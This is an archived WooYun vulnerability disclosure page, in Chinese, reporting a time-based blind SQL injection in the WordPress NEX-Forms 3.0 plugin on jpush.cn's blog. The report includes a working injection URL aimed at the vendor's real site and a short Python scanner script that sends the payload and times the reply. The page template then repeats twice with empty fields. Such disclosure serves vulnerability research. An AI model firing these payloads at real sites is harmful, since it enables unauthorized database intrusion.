极光推送WordPress NEX-Forms 3.0 SQL注入附脚本

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117116

漏洞标题：极光推送WordPress NEX-Forms 3.0 SQL注入附脚本

漏洞作者： Catsay

提交时间：2015-05-30 12:18

修复时间：2015-07-14 15:52

公开时间：2015-07-14 15:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-30：细节已通知厂商并且等待厂商处理中
2015-05-30：厂商已经确认，细节仅向厂商公开
2015-06-09：细节向核心白帽子及相关领域专家公开
2015-06-19：细节向普通白帽子公开
2015-06-29：细节向实习白帽子公开
2015-07-14：细节向公众公开

简要描述：

极光推送WordPress NEX-Forms 3.0 SQL注入附脚本

详细说明：

极光推送WordPress NEX-Forms 3.0 SQL注入附脚本

漏洞证明：

http://blog.jpush.cn/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1%20and%20sleep(5)

脚本参考：http://www.beebeeto.com/pdb/poc-2015-0089/

下面贴出bugscan的脚本

# !/usr/bin/dev python # -*- coding:utf-8 -*- """ referer: http://www.beebeeto.com/pdb/poc-2015-0089/ https://www.exploit-db.com/exploits/36800/ """ import time def assign(service, args): if service == 'wordpress': return True, args def audit(args): verify_url = args payload = 'wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1%20and%20sleep(5)' start_time = time.time() code, head, res, _, _ = curl.curl('%s%s' % (verify_url, payload)) if code == 200 and time.time() - start_time > 4: security_hole(verify_url + payload) pass if __name__ == "__main__": from dummy import * audit(assign('wordpress', 'http://www.example.com/')[1])

修复方案：

。。

版权声明：转载请注明来源 Catsay@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：4

确认时间：2015-05-30 15:50

厂商回复：

感谢漏洞提供者

漏洞评价：

2015-05-30 12:47 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友！)

想看看脚本诶
2015-05-30 14:05 | Catsay ( 实习白帽子 | Rank:85 漏洞数:16 | 屌丝一枚)

@mango 私聊发你了哦
2015-05-30 14:06 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友！)

@Catsay 在哪？我短消息没看到诶
2015-05-30 14:07 | Catsay ( 实习白帽子 | Rank:85 漏洞数:16 | 屌丝一枚)

@mango 刚发
2015-05-30 16:03 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

@Catsay 同求 - -
2015-06-06 10:46 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远，还需要厂商和白帽...)

@Catsay 想看看脚本~ 麻烦私信下哈·
2015-06-09 20:17 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友！)

= =/////这跑不出来的、、、、你抛出数据了么
2015-09-22 06:52 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

想看看脚本~QQ876585551@qq.com 发邮箱或者QQ联系，谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117116

漏洞标题：极光推送WordPress NEX-Forms 3.0 SQL注入附脚本

相关厂商：jpush.cn

漏洞作者： Catsay

提交时间：2015-05-30 12:18

修复时间：2015-07-14 15:52

公开时间：2015-07-14 15:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Catsay@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117116

漏洞标题：极光推送WordPress NEX-Forms 3.0 SQL注入附脚本

相关厂商：jpush.cn

漏洞作者： Catsay

提交时间：2015-05-30 12:18

修复时间：2015-07-14 15:52

公开时间：2015-07-14 15:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0117116"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Catsay@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：